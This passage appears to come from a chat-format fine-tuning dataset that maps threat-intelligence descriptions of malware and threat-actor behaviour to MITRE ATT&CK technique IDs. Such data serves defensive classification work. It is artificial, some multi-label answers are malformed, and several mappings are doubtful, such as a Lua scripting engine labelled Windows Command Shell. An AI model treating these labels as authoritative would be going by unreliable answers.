- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windows Credential Editor can dump credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT can obtain the date and time of a system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has planted Web shells on Outlook Exchange servers."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identifies files with certain extensions and copies them to a directory in the user's profile."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT has the ability to respawn itself using \"ShellExecuteW\" and \"CreateProcessW\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape searches for kubectl.exe by name and the config file using a regular expression. The search function takes an extra argument: a pointer to a vector that holds folder names to exclude from the search"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At the beginning of 2017, Silent Librarian began to regularly obtain free Let’s Encrypt SSL certificates for their phishing pages. This technique, which we have previous discussed at length in blog posts from November and December, is used to create more realistic-looking phishing pages"
- },
- {
- "role": "assistant",
- "content": "T1588.004 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Quickly after the initial compromise, the operator deploys a tool named \"dog.exe. This malware is written in .NET and its purpose is to monitor hard drive paths and to exfiltrate the information via an email account or an FTP, depending on the configuration. The configuration file is named dconf.json"
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then issues a SOAP request to delete the processed email. This completes the process in which the payload receives inbound communications from the actor"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "exfiltrates command output and collected files to its C2 server in 1500-byte blocks."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has cleaned up all files associated with the secondary payload execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It will use an auto-run registry (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) named AdobeMX that will execute PowerShell to load the encoded executable via reflective loading (loading an executable from memory rather than from the system’s disks"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has exfiltrated files and directories of interest from the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads additional files from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Rundll32 to ensure only a single instance of itself is running at once."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi takes screenshots of windows of interest."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager"
- },
- {
- "role": "assistant",
- "content": "T1546.009 - Event Triggered Execution: AppCert DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used mshta.exe for code execution."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel can RC4-encrypt credentials before sending to the C2."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a feature to perform SYN flood attack on a host."
- },
- {
- "role": "assistant",
- "content": "T1499 - Endpoint Denial of Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay has used names to mimic legitimate software including \"vmtoolsd.exe\" to spoof Vmtools."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's server component can spider authentication portals."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains the getFirefoxPassword function to attempt to locate Firefox passwords."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FruitFly persists via a Launch Agent."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kerrdown can use DLL side-loading to load malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion"
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols', 'T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd can be used to find files and directories with native functionality such as \"dir\" commands."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used legitimate services like Google Docs, Google Scripts, and Pastebin for C2."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The r1.log file stores information for exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint has collected credit card data using native API functions."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has used mshta.exe to download and execute applications from a remote server."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor has downloaded additional files onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In previous iterations, the Astaroth Trojan campaign used cerutil to download files. In this iteration, they have replaced certutil with BITSAdmin"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dark Caracal leveraged a watering hole to serve up malicious code."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used malware to decrypt encrypted CAB files."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download remote files onto victims."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT collects the victim username along with other account information (account type, description, full name, SID and status)."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner can download additional scripts from a web server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used \"net localgroup administrators\" to identify accounts with local administrative rights."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 registered devices in order to enable mailbox syncing via the \"Set-CASMailbox\" command."
- },
- {
- "role": "assistant",
- "content": "T1098.005 - Device Registration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex has checked the number of CPUs in the system to avoid being run in a sandbox or emulator."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During execution, the code employs byte randomization to obscure its behavior. This is achieved by using the host’s current time as a seed for a pseudorandom number generator, and then performing additional operations against that output. The resulting values are used to overwrite blocks of previously executed code. This byte manipulation is the first anti-analysis technique observed in the code, as any attempt to dump the memory segment would result in illegitimate or incorrect operations"
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before being deleted, the DLL executes a string decoding routine that is designed to execute for about a minute, spiking central processing unit (CPU) usage for the regsvr32.exe process. Once the strings are decoded, the More_eggs components are decrypted, dropped to the system (normally in the %APPDATA%\\Microsoft\\ or %ProgramData%\\Microsoft\\ directories) and executed"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has staged malware on fraudulent websites set up to impersonate targeted organizations."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the logo and commands are identical to the original hacktool, the name was changed to OrangeTeghal. To evade security software while deploying this tool on compromised systems, the attackers use a technique revealed at Black Hat EU ‘17 in the presentation Lost in Transaction: Process Doppelgänging. Process Doppelgänging uses NTFS transactions to modify the executable of a seemingly benign process that is suspended right after creation"
- },
- {
- "role": "assistant",
- "content": "T1055.013 - Process Doppelgänging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton removes logs from \"/var/logs\" and \"/Library/logs\"."
- },
- {
- "role": "assistant",
- "content": "T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used Regsvr32 to bypass application whitelisting techniques."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan uses a backdoor known as BADFLICK that is is capable of generating a reverse shell, and has used multiple types of scripting for execution, including JavaScript and JavaScript Scriptlets in XML.."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command_Keylog_offline: Load into memory a dll that contains the function “PluginMe”. After researching and analyzing additional Gh0stRAT samples while trying to figure out what dll contains “PluginMe”, I found a DLL for keylogging (called Keylog.dll) in a Gh0stRAT 2.0 sample that exported “PluginMe”. Using that and a cross-comparison of another Gh0stRAT sample that I’ve previously analyzed, I was able to determine that “PluginMe” is a offline keyboard manager"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can use a hardcoded server public RSA key to encrypt the first request to C2."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth collects data in a plaintext file named r1.log before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used malware to disable Windows Defender through modification of the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This section describes how we identified additional Stealth Falcon victims and bait content, and traced Stealth Falcon’s spyware to additional C2 servers"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can leverage its implementation of Mimikatz to obtain and use silver tickets."
- },
- {
- "role": "assistant",
- "content": "T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These vulnerabilities include:CVE-2015-6585: Hangul Word Processor VulnerabilityCVE-2015-8651: Adobe Flash Player 18.0.0.324 and 19.x VulnerabilityCVE-2016-0034: Microsoft Silverlight 5.1.41212.0 VulnerabilityCVE-2016-1019: Adobe Flash Player 21.0.0.197 VulnerabilityCVE-2016-4117: Adobe Flash Player 21.0.0.226 VulnerabilityDHS recommends that organizations upgrade these applications to the latest version and patch level"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using the machine's local time, XCSSET waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, \".report\". After the elapsed time, XCSSET executes additional modules."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has an integrated scripting engine to download and execute Lua scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Maze encryption process has used batch scripts with various commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
